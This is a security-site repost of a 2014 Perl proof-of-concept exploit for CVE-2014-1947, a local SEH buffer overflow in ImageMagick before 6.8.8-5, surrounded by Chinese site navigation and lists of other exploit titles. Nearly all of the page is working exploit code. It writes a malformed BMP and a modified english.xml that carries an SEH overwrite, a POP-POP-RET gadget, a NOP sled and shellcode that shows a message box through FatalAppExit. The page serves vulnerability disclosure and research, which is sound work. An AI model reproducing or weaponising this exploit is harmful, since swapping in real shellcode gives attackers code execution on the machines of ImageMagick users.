首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ImageMagick 6.8.8-4 - Local Buffer Overflow (SEH)
来源:@SecuritySift 作者:Czumak 发布时间:2014-02-17  
#!/usr/bin/perl
########################################################################################
# Exploit Title: ImageMagick < 6.8.8-5 - Local Buffer Overflow (SEH)
# Date: 2-13-2014
# Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift
# Vulnerable Software: ImageMagick (all versions prior to 6.8.8-5)
# Software Link: http://ftp.sunet.se/pub/multimedia/graphics/ImageMagick/binaries/
# Version Tested: 6.8.8-4
# Tested On: Windows XP SP3
########################################################################################
# Credits:
# CVE-2014-1947 published Feb 08 2014
#               by Justin Grant
#               http://www.securityfocus.com/bid/65478/info
#
########################################################################################
# Overview:
#
# I saw the notice for this CVE today but there was no known published expoits so 
# I figured I'd put together this quick POC. Note, all app modules for the tested 
# version were compiled with safeSEH so my use of an OS module may require adjustment  
# of the offsets. There also appears to be several bad chars that fail the sploit.
# For this POC I only generate a basic messagebox using FatalAppExit(). It may take 
# some work to get it to do more.
#
# How it works:
# This particular BOF takes advantage of insecure handling of the english.xml file
# which the app uses to display various error messages. I didn't spend much time 
# investigating the app so there may be additional vulnerable locations
# This script generates two files:
#   1) a malfored .bmp file that will cause ImageMagick to generate a specific
#      error when opened (LengthAndFilesizeDoNotMatch), as defined in the 
#      english.xml file
#   2) a modified  english.xml file that replaces the original error message with 
#      our exploit code
#
# To test this POC:
#   1) run the script, replace the original english.xml file (in App's folder)
#   2) open the .bmp file with ImageMagick
########################################################################################
  
# file write function 
sub write_file { 
  my ($file, $buffer) = @_;
  open(FILE, ">$file");
  print FILE $buffer;
  close(FILE);
  print "Exploit file [" . $file . "] created\n";
  print "Buffer size: " . length($buffer) . "\n"
}
  
# create bmp file header; needs to be a valid header to generate necessary error
sub bmp_header {
   my $header = "\x42\x4d"; # BM
   $header = $header . "\x46\x00\x00\x00"; # file size (70 bytes)
   $header = $header . "\x00\x00\x00\x00"; # unused 
   $header = $header . "\x36\x00\x00\x00"; # bitmap offset
   $header = $header . "\x28\x00\x00\x00"; # header size
   $header = $header . "\x02\x00\x00\x00"; # width
   $header = $header . "\x02\x00\x00\x00"; # height
   $header = $header . "\x01\x00"; # num of color planes
   $header = $header . "\x18\x00"; # num of bits per pixel
   $header = $header . "\x00\x00\x00\x00"; # compression (none)
   $header = $header . "\x10\x00\x00\x00"; # image size
   $header = $header . "\x13\x0b\x00\x00"; # horizontal resolution (2,835 pixels/meter)
   $header = $header . "\x13\x0b\x00\x00"; # vertical resolution (2,835 pixels/meter)
   $header = $header . "\x00\x00\x00\x00"; # colors in palette
   $header = $header . "\x00\x00\x00\x00"; #important colors
   return $header;
}
  
## Construct the corrupted bmp file which will trigger the vuln
my $header = bmp_header();
my $data = "\x41" x (5000 - length($header)); # arbitrary file data filler
my $buffer = $header.$data
write_file("corrupt.bmp", $buffer);
  
# construct the buffer payload for our xml file
my $buffsize = 100000;
my $junk = "\x41" x 62504; # offset to next seh at 568
my $nseh = "\xeb\x32\x90\x90"; # overwrite next seh with jmp instruction (20 bytes)
my $seh = pack('V', 0x74c82f4f); # : pop ebp  pop ebx  ret
                 # ASLR: False, Rebase: False, SafeSEH: False, OS: True, C:\WINDOWS\system32\OLEACC.dll)
my $junk2 = "\x41" x 12; # there are at least two possible offsets -- 1 for  file-> open and 1 for the open file menubar button 
my $nops = "\x90" x 100;
  
# this is just a POC shellcode that displays a messagebox using the FatalAppExit function 
my $shell = "\xb9\x7c\xec\xa5\x7c" . # Unicode String "FailSilently" (address may vary)
        "\x31\xc0" . # xor eax, eax
        "\xbb\xb2\x1b\x86\x7c" . # kernel32.dll FatalAppExit()
        "\x51" . # push ecx
        "\x50" . # push eax
        "\xff\xd3"; # call ebx
  
my $sploit = $junk.$nseh.$seh.$junk2.$nseh.$seh.$nops.$shell; # assemble the exploit portion of the buffer
my $fill = "\x43" x ($buffsize - (length($sploit))); # fill remainder of buffer with junk
$sploit = $sploit.$fill; # assemble the final buffer
  
# build the malicious xml file
my $xml = '<?xml version="1.0" encoding="UTF-8"?><locale name="english"><exception><corrupt><image><warning><message name="LengthAndFilesizeDoNotMatch">'
$xml = $xml . $sploit;
$xml = $xml . '</message></warning></image></corrupt></exception></locale>';
my $buffer = $xml;
write_file("english.xml", $buffer);

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Easy CD-DA Recorder PLS Buffer
·HP Data Protector EXEC_BAR Rem
·Apache Commons FileUpload and
·Dexter (CasinoLoader) SQL Inje
·KingScada kxClientDownload.ocx
·Linksys E-series Unauthenticat
·Windows Command Shell Upgrade
·Eudora Qualcomm WorldMail 9.0.
·Windows TrackPopupMenuEx Win32
·Oracle Forms and Reports Remot
·Kloxo SQL Injection / Remote C
·Linksys Worm Remote Root
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved